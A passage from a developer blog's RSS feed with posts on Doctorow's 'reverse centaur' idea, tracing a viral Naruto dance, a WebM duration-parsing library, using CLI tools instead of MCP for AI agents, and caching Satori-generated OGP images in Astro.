</content:encoded></item><item><title>The Reverse Centaur</title><link>https://ainoya.dev/posts/the-reverse-centaur/</link><guid isPermaLink="true">https://ainoya.dev/posts/the-reverse-centaur/</guid><description>🤖+🦵</description><pubDate>Tue, 16 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I recently read &lt;a href=&quot;https://pluralistic.net/2025/12/10/the-reverse-centaurs-guide-to-criticizing-ai/&quot;&gt;&quot;The Reverse Centaur’s Guide to Criticizing AI,&quot;&lt;/a&gt; where Cory Doctorow makes a crucial distinction:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In automation theory, a &quot;centaur&quot; is a person who is assisted by a machine...
Obviously, a reverse centaur is machine head on a human body, a person who is serving as a squishy meat appendage for an uncaring machine.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I feel this split is widening based on the difficulty of &lt;strong&gt;verification&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In software engineering, where testing and verification are relatively easy to automate, Generative AI empowers us as &lt;strong&gt;Centaurs&lt;/strong&gt;.
However, in physical tasks or complex human communication—where verification is difficult—technology often turns humans into &lt;strong&gt;Reverse Centaurs&lt;/strong&gt;. Instead of assistance, the machine simply imposes strict efficiency metrics, forcing humans to bridge the gap between algorithmic logic and reality at an exhausting pace.&lt;/p&gt;
&lt;p&gt;Pursuing efficiency to the point where the workplace becomes hostile to humans puts the cart before the horse.&lt;/p&gt;
</content:encoded></item><item><title>Digital Folklore: The Unsearchable Origins of the &apos;Silhouette&apos; Dance</title><link>https://ainoya.dev/posts/digital-folklore-silhouette-dance/</link><guid isPermaLink="true">https://ainoya.dev/posts/digital-folklore-silhouette-dance/</guid><description>Tracing the origins of the viral &apos;Silhouette&apos; dance challenge reveals the difficulties of searching choreography in the age of digital folklore.</description><pubDate>Sat, 13 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Around November 2025, a specific dance challenge began to go viral in Japan. Set to KANA-BOON&apos;s iconic track &lt;em&gt;&quot;Silhouette&quot;&lt;/em&gt; (a beloved &lt;em&gt;Naruto&lt;/em&gt; opening theme), the choreography mimics ninja hand signs (ninjutsu) synchronized to the beat.&lt;/p&gt;
&lt;p&gt;While the trend itself is widespread, one question remains surprisingly difficult to answer: &lt;strong&gt;Who actually choreographed this?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As I attempted to trace the &quot;Patient Zero&quot; of this viral movement, I encountered a fascinating problem that highlights the current limitations of information retrieval in the age of video.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Search for the Originator&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Finding the source of a text-based meme is relatively straightforward in 2025. Large Language Models (LLMs) and advanced search indices can parse forums and archives effectively. However, tracking the origin of a specific physical movement—a choreography—across platforms like TikTok and Instagram remains a significant challenge.&lt;/p&gt;
&lt;p&gt;The difficulty stems from two main factors:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Semi-Closed Ecosystems:&lt;/strong&gt; Much of this data resides within the &quot;walled gardens&quot; of vertical video platforms, which are not fully indexed by open web crawlers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The &quot;Choreography&quot; Data Problem:&lt;/strong&gt; Search engines still struggle to identify and categorize specific sequences of human motion. Unlike keywords, a dance move is fluid. It undergoes subtle &quot;remixes&quot; and modifications with every user iteration, behaving more like ancient oral tradition or folklore than digital data.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;The Oldest Record So Far&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In my personal investigation, the oldest instance I could verify is a post by &lt;code&gt;@ross.hime&lt;/code&gt; dated &lt;strong&gt;July 19, 2025&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote class=&quot;tiktok-embed&quot; cite=&quot;https://www.tiktok.com/@ross.hime/video/7528762593809288456&quot; data-video-id=&quot;7528762593809288456&quot; style=&quot;max-width: 605px;min-width: 325px;&quot;&gt;
&lt;section&gt;
&lt;a target=&quot;_blank&quot; title=&quot;@ross.hime&quot; href=&quot;https://www.tiktok.com/@ross.hime?refer=embed&quot;&gt;@ross.hime&lt;/a&gt; naruto ninjitsu hands tutorial please 😂
&lt;a title=&quot;narutoshippuden&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/narutoshippuden?refer=embed&quot;&gt;#narutoshippuden&lt;/a&gt;
&lt;a title=&quot;silloulettechallenge&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/silloulettechallenge?refer=embed&quot;&gt;#silloulettechallenge&lt;/a&gt;
&lt;a title=&quot;fyppppppppppppppppppppppp&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/fyppppppppppppppppppppppp?refer=embed&quot;&gt;#fyppppppppppppppppppppppp&lt;/a&gt;
&lt;a title=&quot;japan&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/japan?refer=embed&quot;&gt;#japan&lt;/a&gt;
&lt;a title=&quot;anime&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/anime?refer=embed&quot;&gt;#anime&lt;/a&gt;
&lt;a title=&quot;dancechallenge&quot; target=&quot;_blank&quot; href=&quot;https://www.tiktok.com/tag/dancechallenge?refer=embed&quot;&gt;#dancechallenge&lt;/a&gt;
&lt;a target=&quot;_blank&quot; title=&quot;♬ シルエット - KANA-BOON&quot; href=&quot;https://www.tiktok.com/music/シルエット-7525407952354822928?refer=embed&quot;&gt;♬ シルエット - KANA-BOON&lt;/a&gt;
&lt;/section&gt;
&lt;/blockquote&gt;
&lt;script async src=&quot;https://www.tiktok.com/embed.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;However, given the nature of the internet, it is highly probable that an even earlier version exists—perhaps the one that inspired this very video.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Crowdsourcing the History&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;It is ironic that, despite the leap in AI capabilities for text and code generation, we still lack a reliable &quot;Reverse Choreography Search.&quot; The history of internet culture is being written in video format, and without proper archiving, the origins of these cultural moments risk being lost to the feed.&lt;/p&gt;
&lt;p&gt;If you know of a version of the &lt;em&gt;Silhouette&lt;/em&gt; dance that pre-dates July 2025, or if you have information about the true originator, please let me know. I am collecting information via the form below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://forms.gle/CsjEoEtgKHfhXbYQ7&quot;&gt;Submit Information Here&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I will update this post if new evidence comes to light.&lt;/p&gt;
</content:encoded></item><item><title>Fixing the WebM &quot;Missing Duration&quot; Problem with a Lightweight, Zero-Dependency Library</title><link>https://ainoya.dev/posts/webm-missing-duration/</link><guid isPermaLink="true">https://ainoya.dev/posts/webm-missing-duration/</guid><description>How webm-meta-lite extracts reliable WebM durations with a three-stage fallback without heavy dependencies.</description><pubDate>Sun, 07 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Have you ever implemented audio or video recording features using the browser&apos;s standard &lt;code&gt;MediaRecorder&lt;/code&gt; API? While it is a powerful and convenient API, developers often run into a frustrating issue: the generated WebM files frequently lack the &lt;code&gt;Duration&lt;/code&gt; metadata property, or report it as &lt;code&gt;Infinity&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This &quot;missing duration&quot; issue causes several downstream problems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Server-side validation fails:&lt;/strong&gt; Checks like &quot;Max duration: 1 minute&quot; become impossible.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Media players struggle:&lt;/strong&gt; Total time is not displayed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;UI glitches:&lt;/strong&gt; Seek bars fail to function correctly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To solve this problem and accurately calculate the playback duration directly from WebM binaries, I built a new library called &lt;strong&gt;webm-meta-lite&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Repository: &lt;a href=&quot;https://github.com/ainoya/webm-meta-lite&quot;&gt;https://github.com/ainoya/webm-meta-lite&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;The Problem with Existing Solutions&lt;/h2&gt;
&lt;p&gt;When I first faced this issue, I researched existing solutions, but they felt like using a sledgehammer to crack a nut.&lt;/p&gt;
&lt;h3&gt;1. Using FFmpeg&lt;/h3&gt;
&lt;p&gt;FFmpeg is the industry standard for media processing. However, installing a massive binary on a server or container just to read a single timestamp is overkill. It significantly bloats Docker image sizes and adds unnecessary complexity to the deployment pipeline.&lt;/p&gt;
&lt;h3&gt;2. Existing JavaScript Libraries&lt;/h3&gt;
&lt;p&gt;There are Node.js libraries for WebM, but many are bundled with heavy recording or transcoding features. I only needed a lightweight parser, not a full media suite.&lt;/p&gt;
&lt;h2&gt;The Solution: webm-meta-lite&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;webm-meta-lite&lt;/code&gt; focuses on parsing the WebM binary structure to calculate the exact duration efficiently.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Zero Dependencies:&lt;/strong&gt; No external runtime dependencies to worry about.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pure TypeScript:&lt;/strong&gt; No native binaries required. It runs seamlessly in both browsers and Node.js.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Read-Only / Safe:&lt;/strong&gt; It scans the binary to extract information without mutating or rewriting files.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Usage&lt;/h2&gt;
&lt;p&gt;The API is straightforward. You pass a WebM &lt;code&gt;Blob&lt;/code&gt; (or a compatible Reader), and it returns the parsed metadata.&lt;/p&gt;
&lt;p&gt;If you are using Node.js (v19.8+), utilizing &lt;code&gt;fs.openAsBlob&lt;/code&gt; is the cleanest approach.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { parseWebm } from &apos;webm-meta-lite&apos;;
import { openAsBlob } from &apos;node:fs&apos;;

async function main() {
  // 1. Open the file as a Blob (Node.js v19.8+)
  const blob = await openAsBlob(&apos;./input.webm&apos;);

  // 2. Parse Metadata
  // Even if the header lacks duration, the library scans the data to calculate it.
  const metadata = await parseWebm(blob);

  // 3. Use the result
  // Note: The unit is milliseconds
  console.log(`Duration: ${metadata.durationMilliSeconds} ms`);
  
  // Example: Server-side validation
  if (metadata.durationMilliSeconds &amp;gt; 60 * 1000) {
    throw new Error(&apos;Uploads must be under 1 minute.&apos;);
  }
}

main();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For browsers, you can pass the &lt;code&gt;File&lt;/code&gt; object directly. For older Node.js versions, the library also provides a &lt;code&gt;createBufferReader&lt;/code&gt; helper.&lt;/p&gt;
&lt;h2&gt;How It Works: The 3-Stage Fallback Strategy&lt;/h2&gt;
&lt;p&gt;The core strength of this library lies in its algorithm. If the metadata is not found in the header, it calculates the duration from the actual data. Inspired by robust implementations in FFmpeg and webminspector, &lt;code&gt;webm-meta-lite&lt;/code&gt; uses a &lt;strong&gt;3-stage fallback strategy&lt;/strong&gt; to ensure accuracy while maintaining performance.&lt;/p&gt;
&lt;h3&gt;Step 1: Header Scan&lt;/h3&gt;
&lt;p&gt;The library reads the first 64KB of the file. If the Duration is present in the &lt;code&gt;Info&lt;/code&gt; segment, it returns immediately. This is the fastest path.&lt;/p&gt;
&lt;h3&gt;Step 2: Cues Scan&lt;/h3&gt;
&lt;p&gt;If the header is missing the duration, it looks for the &lt;code&gt;Cues&lt;/code&gt; (index) element. If found, it uses the timestamp of the last Cue point to determine the length.&lt;/p&gt;
&lt;h3&gt;Step 3: Tail Scan (The &quot;Safety Net&quot;)&lt;/h3&gt;
&lt;p&gt;If neither of the above works—common with streamed recordings—the library performs a &lt;strong&gt;Tail Scan&lt;/strong&gt;. It reads only the last 2MB of the file and scans the byte-level structure of the &lt;code&gt;Cluster&lt;/code&gt; elements. By finding the timestamp of the very last audio/video block, it calculates the precise total duration.&lt;/p&gt;
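&lt;p&gt;Reduced to its decision logic, the fallback looks like this (a sketch, not the library&apos;s actual code; each argument is the duration a stage recovered, or &lt;code&gt;null&lt;/code&gt; if that stage found nothing):&lt;/p&gt;

```javascript
// Sketch of the 3-stage fallback order (illustrative names, not library code).
function resolveDurationMs(headerMs, lastCueMs, lastBlockMs) {
  if (headerMs !== null) return headerMs;   // Step 1: Duration in the Info segment
  if (lastCueMs !== null) return lastCueMs; // Step 2: timestamp of the last Cue point
  return lastBlockMs;                       // Step 3: last block found by the tail scan
}
```

&lt;p&gt;Each stage runs only when the previous one fails, so the common case stays on the fast 64KB header path.&lt;/p&gt;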
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;MediaRecorder&lt;/code&gt; often produces WebM files with missing or &lt;code&gt;Infinity&lt;/code&gt; duration.&lt;/li&gt;
&lt;li&gt;FFmpeg is frequently too heavy for simple duration checks.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;webm-meta-lite&lt;/code&gt; provides a lightweight, zero-dependency, and fast way to calculate duration.&lt;/li&gt;
&lt;li&gt;It implements a robust 3-stage fallback algorithm inspired by FFmpeg.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you need to validate user-uploaded audio/video on the backend or display accurate times in your UI, give it a try!&lt;/p&gt;
</content:encoded></item><item><title>Building Small CLI Tools for AI Agents</title><link>https://ainoya.dev/posts/why-cli-instead-of-mcp/</link><guid isPermaLink="true">https://ainoya.dev/posts/why-cli-instead-of-mcp/</guid><description>Explain why I chose CLI over MCP for AI agents, focusing on &apos;information economics&apos; and Unix philosophy.</description><pubDate>Sat, 06 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Recently, the &lt;strong&gt;Model Context Protocol (MCP)&lt;/strong&gt; has been gaining significant attention in the context of AI agent utilization. However, I deliberately chose a different path—a mature approach using the &lt;strong&gt;CLI (Command Line Interface)&lt;/strong&gt;—to create my own operation interfaces for daily tools like Slack, Atlassian, and Esa, going against the current trend.&lt;/p&gt;
&lt;p&gt;&quot;Why use a simple CLI now instead of the rich MCP?&quot; The reason lies in the &lt;strong&gt;&quot;economics of information&quot;&lt;/strong&gt; surrounding the context windows of current LLMs and a return to the good old &lt;strong&gt;&quot;Unix Philosophy&quot;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Here are the tools I created (written in Go):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Slack CLI&lt;/strong&gt;: &lt;a href=&quot;https://github.com/ainoya/slack-cli&quot;&gt;https://github.com/ainoya/slack-cli&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Atlassian CLI&lt;/strong&gt;: &lt;a href=&quot;https://github.com/ainoya/atlassian-cli&quot;&gt;https://github.com/ainoya/atlassian-cli&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Esa CLI&lt;/strong&gt;: &lt;a href=&quot;https://github.com/ainoya/esa-cli&quot;&gt;https://github.com/ainoya/esa-cli&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The &quot;Context Pressure&quot; Problem with MCP&lt;/h2&gt;
&lt;p&gt;Many current MCP server implementations tend to be designed to pass rich information from connected tools into the context. However, LLM context windows are finite and cost money. Simply asking an AI to &quot;check the latest Slack messages&quot; can result in loading a massive amount of unnecessary noise, lowering the signal-to-noise ratio of information (which in turn lowers the accuracy of the answer). This puts the cart before the horse.&lt;/p&gt;
&lt;h2&gt;&quot;Pre-filtering&quot; with CLI and Pipelines&lt;/h2&gt;
&lt;p&gt;This is where the strength of the CLI comes into play. With a CLI, you can physically narrow down information using Linux pipeline processing &lt;em&gt;before&lt;/em&gt; passing it to the AI.&lt;/p&gt;
&lt;p&gt;For example, when letting an AI agent read logs, an MCP implementation might inadvertently pass &quot;all logs&quot;. With a CLI, you can write it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Filter only the truly necessary information and pass it to the context
slack-cli log --channel &quot;dev-ops&quot; | grep &quot;ERROR&quot; | tail -n 20
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead of throwing raw information at the AI, humans filter it with intention (Pre-filtering). I believe this &lt;strong&gt;&quot;Unix Philosophy&quot;&lt;/strong&gt; approach is what directly leads to token savings and improved accuracy.&lt;/p&gt;
&lt;h2&gt;The Ease of Defining in &quot;Markdown&quot;&lt;/h2&gt;
&lt;p&gt;The CLI approach is also advantageous for configuring &lt;strong&gt;Claude Code&lt;/strong&gt; or &lt;strong&gt;Cursor&lt;/strong&gt;. Modifying the logic of an MCP server itself is a hassle, but with a CLI, you can tune the behavior simply by describing instructions in Markdown (natural language), such as &quot;run this command with these arguments&quot;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;MCP&lt;/strong&gt;: Requires server-side code modifications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CLI&lt;/strong&gt;: Adjustable just by rewriting the prompt (configuration file).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This &quot;tactile feel&quot; and &quot;agility&quot; are extremely important in individual development workflows.&lt;/p&gt;
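&lt;p&gt;As a concrete sketch, an instruction file for an agent might contain nothing more than the following (the file contents and rules here are hypothetical, reusing the pipeline from earlier):&lt;/p&gt;

```markdown
## Checking recent errors in Slack

- To summarize recent errors, run:
  `slack-cli log --channel "dev-ops" | grep "ERROR" | tail -n 20`
- Pass only the filtered output into context; never fetch full channel history.
```

&lt;p&gt;Changing the channel, the filter, or the line count is a one-line prompt edit, with no server code to redeploy.&lt;/p&gt;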
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;Of course, MCP is suitable for operations requiring complex state management. However, for &quot;Read operations&quot; such as checking documents or logs, I feel that the &lt;strong&gt;CLI × Pipeline&lt;/strong&gt; approach might actually be the most &lt;strong&gt;&quot;AI Native&quot;&lt;/strong&gt; solution.&lt;/p&gt;
&lt;p&gt;If you are interested, please take a look at the repositories.&lt;/p&gt;
</content:encoded></item><item><title>Cache Satori-generated OGP images in Astro Cactus to speed up builds</title><link>https://ainoya.dev/posts/astro-ogp-build-cache/</link><guid isPermaLink="true">https://ainoya.dev/posts/astro-ogp-build-cache/</guid><description>Astro Cactus generates an OGP image per post with Satori + Resvg. By caching the PNGs locally and using a content hash, we can avoid regenerating unchanged images and cut build time.</description><pubDate>Mon, 25 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://astro.build/themes/details/astro-cactus/&quot;&gt;Astro Cactus&lt;/a&gt; ships with dynamic Open Graph (OGP) images: for each post, the theme renders a title card using Satori (to SVG) and Resvg (to PNG). It’s convenient—but if every image is regenerated on every build, the OGP step adds up. On my machine, each image takes roughly 100–300 ms, which becomes noticeable with dozens of posts.&lt;/p&gt;
&lt;p&gt;This post shows a simple, file-based cache that avoids re-rendering unchanged images. The approach is deterministic, CI-friendly, and requires no extra services.&lt;/p&gt;
&lt;h2&gt;How it works&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;We compute a content hash from the post’s title and date.&lt;/li&gt;
&lt;li&gt;We store the rendered PNG in &lt;code&gt;node_modules/.og_image_cache/&amp;lt;hash&amp;gt;.png&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;On the next build, if the PNG exists, we reuse it; otherwise we render and save.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The cache key changes whenever the title or date changes, so the image is re-rendered only when necessary.&lt;/p&gt;
&lt;h2&gt;The code&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;import crypto from &quot;node:crypto&quot;;
import fs from &quot;node:fs&quot;;
import path from &quot;node:path&quot;;
import { Resvg } from &quot;@resvg/resvg-js&quot;;
import type { APIContext } from &quot;astro&quot;;
import satori, { type SatoriOptions } from &quot;satori&quot;;
import { html } from &quot;satori-html&quot;;
import RobotoMonoBold from &quot;@/assets/roboto-mono-700.ttf&quot;;
import RobotoMono from &quot;@/assets/roboto-mono-regular.ttf&quot;;
import { getAllPosts } from &quot;@/data/post&quot;;
import { siteConfig } from &quot;@/site.config&quot;;
import { getFormattedDate } from &quot;@/utils/date&quot;;

const ogOptions: SatoriOptions = {
  // debug: true,
  fonts: [
    { data: Buffer.from(RobotoMono), name: &quot;Roboto Mono&quot;, style: &quot;normal&quot;, weight: 400 },
    { data: Buffer.from(RobotoMonoBold), name: &quot;Roboto Mono&quot;, style: &quot;normal&quot;, weight: 700 },
  ],
  height: 630,
  width: 1200,
};

// Cache directory: keep it out of git, easy to persist in CI.
const CACHE_DIR = path.join(process.cwd(), &quot;node_modules&quot;, &quot;.og_image_cache&quot;);

// Ensure cache directory exists.
function ensureCacheDir() {
  if (!fs.existsSync(CACHE_DIR)) {
    fs.mkdirSync(CACHE_DIR, { recursive: true });
  }
}

// Create a short, deterministic content hash.
function generateContentHash(title: string, pubDate: Date): string {
  const content = `${title}-${pubDate.toISOString()}`;
  return crypto.createHash(&quot;sha256&quot;).update(content).digest(&quot;hex&quot;).slice(0, 16);
}

// Lookup or render the PNG, then persist it.
async function getCachedOrGeneratePng(
  title: string,
  pubDate: Date,
  postDate: string,
): Promise&amp;lt;Uint8Array&amp;gt; {
  ensureCacheDir();

  const contentHash = generateContentHash(title, pubDate);
  const cacheFilePath = path.join(CACHE_DIR, `${contentHash}.png`);

  if (fs.existsSync(cacheFilePath)) {
    console.log(`Using cached OG image for: ${title}`);
    return new Uint8Array(fs.readFileSync(cacheFilePath));
  }

  console.log(`Generating new OG image for: ${title}`);
  const svg = await satori(markup(title, postDate), ogOptions);
  const png = new Resvg(svg).render().asPng();
  const pngBuffer = new Uint8Array(png);

  fs.writeFileSync(cacheFilePath, pngBuffer);
  return pngBuffer;
}

const markup = (title: string, pubDate: string) =&amp;gt;
  html`&amp;lt;div tw=&quot;flex flex-col w-full h-full bg-[#1d1f21] text-[#c9cacc]&quot;&amp;gt;
    &amp;lt;div tw=&quot;flex flex-col flex-1 w-full p-10 justify-center&quot;&amp;gt;
      &amp;lt;p tw=&quot;text-2xl mb-6&quot;&amp;gt;${pubDate}&amp;lt;/p&amp;gt;
      &amp;lt;h1 tw=&quot;text-6xl font-bold leading-snug text-white&quot;&amp;gt;${title}&amp;lt;/h1&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div tw=&quot;flex items-center justify-between w-full p-10 border-t border-[#2bbc89] text-xl&quot;&amp;gt;
      &amp;lt;div tw=&quot;flex items-center&quot;&amp;gt;
        &amp;lt;p tw=&quot;font-semibold&quot;&amp;gt;${siteConfig.title}&amp;lt;/p&amp;gt;
      &amp;lt;/div&amp;gt;
      &amp;lt;p&amp;gt;by ${siteConfig.author}&amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;`;

export async function GET(context: APIContext) {
  const { pubDate, title } = context.props;

  const postDate = getFormattedDate(pubDate, {
    month: &quot;long&quot;,
    weekday: &quot;long&quot;,
  });

  const pngBuffer = await getCachedOrGeneratePng(title, pubDate, postDate);

  const body = pngBuffer.slice(0).buffer;
  return new Response(body, {
    headers: {
      // Adjust cache headers as needed for your use case.
      &quot;Cache-Control&quot;: &quot;public, max-age=31536000, immutable&quot;,
      &quot;Content-Type&quot;: &quot;image/png&quot;,
    },
  });
}

export async function getStaticPaths() {
  const posts = await getAllPosts();
  return posts
    .filter(({ data }) =&amp;gt; !data.ogImage) // skip if a custom image is set
    .map((post) =&amp;gt; ({
      params: { slug: post.id },
      props: {
        pubDate: post.data.updatedDate ?? post.data.publishDate,
        title: post.data.title,
      },
    }));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;What each piece does&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Cache directory
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;node_modules/.og_image_cache&lt;/code&gt; is ignored by git and easy to persist across CI runs. If your CI re-installs dependencies from scratch, persist this path between builds to get the benefit.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Cache key
&lt;ul&gt;
&lt;li&gt;`sha256(title + ISO(pubDate)), first 16 hex chars. If the title or date changes, we get a new key and the image is regenerated.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;SVG → PNG
&lt;ul&gt;
&lt;li&gt;Satori returns SVG; Resvg rasterizes to PNG. Fonts are embedded via SatoriOptions so the output is deterministic.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Endpoint behavior
&lt;ul&gt;
&lt;li&gt;The endpoint uses &lt;code&gt;getStaticPaths()&lt;/code&gt; with props so the images are pre-rendered at build time (SSG). The &lt;code&gt;Cache-Control&lt;/code&gt; header is for browser/CDN caching and is separate from the on-disk cache.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Updated posts
&lt;ul&gt;
&lt;li&gt;We pass &lt;code&gt;updatedDate ?? publishDate&lt;/code&gt; to the hash. Any content update that bumps &lt;code&gt;updatedDate&lt;/code&gt; will invalidate the image.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Operational notes&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CI persistence
&lt;ul&gt;
&lt;li&gt;If builds happen in a clean environment, configure your CI cache to persist &lt;code&gt;node_modules/.og_image_cache&lt;/code&gt;. No additional services are needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;When to invalidate
&lt;ul&gt;
&lt;li&gt;Decide what should trigger a new image. Title + date works for most blogs. If you frequently tweak the template, include a version salt (see below).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Growth management
&lt;ul&gt;
&lt;li&gt;Over long periods, the cache can grow. Consider a small cleanup script to remove files older than N days.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
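&lt;p&gt;A minimal cleanup script might look like this (a sketch; the helper name and the 30-day threshold are my own, not part of the theme):&lt;/p&gt;

```javascript
// Sketch: find cached OG images whose mtime is older than maxAgeDays.
import fs from "node:fs";
import path from "node:path";

function staleFiles(dir, maxAgeDays, now = Date.now()) {
  if (!fs.existsSync(dir)) return [];
  const cutoff = now - maxAgeDays * 24 * 60 * 60 * 1000;
  return fs
    .readdirSync(dir)
    .map((name) => path.join(dir, name))
    .filter((p) => fs.statSync(p).isFile())
    .filter((p) => cutoff > fs.statSync(p).mtimeMs);
}

// Delete anything untouched for 30+ days.
for (const p of staleFiles(path.join("node_modules", ".og_image_cache"), 30)) {
  fs.unlinkSync(p);
}
```

&lt;p&gt;Run it before the build, or wire it into a scheduled CI job.&lt;/p&gt;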
&lt;h2&gt;Optional improvements&lt;/h2&gt;
&lt;h3&gt;1. Add a template/version salt&lt;/h3&gt;
&lt;p&gt;If you change fonts, colors, or layout, you likely want all images to refresh. Add a constant to the hash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const CACHE_VERSION = &quot;v1&quot;; // bump when markup/fonts change
function generateContentHash(title: string, pubDate: Date): string {
  const content = `${CACHE_VERSION}|${title}|${pubDate.toISOString()}`;
  return crypto.createHash(&quot;sha256&quot;).update(content).digest(&quot;hex&quot;).slice(0, 16);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;2. Hash the actual markup&lt;/h3&gt;
&lt;p&gt;For the most robust invalidation, hash the full SVG input (including site title/author/date formatting):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const svgInput = markup(title, postDate);
const contentHash = crypto.createHash(&quot;sha256&quot;).update(JSON.stringify({ svgInput })).digest(&quot;hex&quot;).slice(0, 16);
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;3. Store pre-renders under &lt;code&gt;public/og/&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;If you prefer visible, versioned assets that can be uploaded to a CDN or backed up outside node_modules, write PNGs to &lt;code&gt;public/og/&amp;lt;hash&amp;gt;.png&lt;/code&gt; and reference them by URL. The trade-off is repo churn or extra cleanup if you commit them.&lt;/p&gt;
&lt;h3&gt;4. Concurrency controls for very large blogs&lt;/h3&gt;
&lt;p&gt;When building hundreds of images in parallel, Resvg can saturate CPU. A simple promise pool (e.g., p-limit) around your generation logic can keep the build smooth.&lt;/p&gt;
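&lt;p&gt;If you&apos;d rather not add a dependency, a tiny promise pool is enough (a sketch; &lt;code&gt;renderOg&lt;/code&gt; in the usage comment is a hypothetical stand-in for your generation function):&lt;/p&gt;

```javascript
// Minimal promise pool (sketch): run async tasks with bounded concurrency.
async function promisePool(limit, tasks) {
  const results = new Array(tasks.length);
  let next = 0;
  const worker = async () => {
    while (tasks.length > next) {
      const i = next;
      next += 1; // claim an index synchronously, then await the task
      results[i] = await tasks[i]();
    }
  };
  await Promise.all(Array.from({ length: limit }, () => worker()));
  return results;
}

// Usage: const pngs = await promisePool(4, posts.map((post) => () => renderOg(post)));
```

&lt;p&gt;Because JavaScript is single-threaded, claiming &lt;code&gt;next&lt;/code&gt; before the &lt;code&gt;await&lt;/code&gt; is race-free; at most &lt;code&gt;limit&lt;/code&gt; renders are in flight at once.&lt;/p&gt;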
&lt;h3&gt;5. Font and license hygiene&lt;/h3&gt;
&lt;p&gt;Keep fonts local and embed them via SatoriOptions as shown. Make sure your font license permits embedding in generated images.&lt;/p&gt;
&lt;h2&gt;Results&lt;/h2&gt;
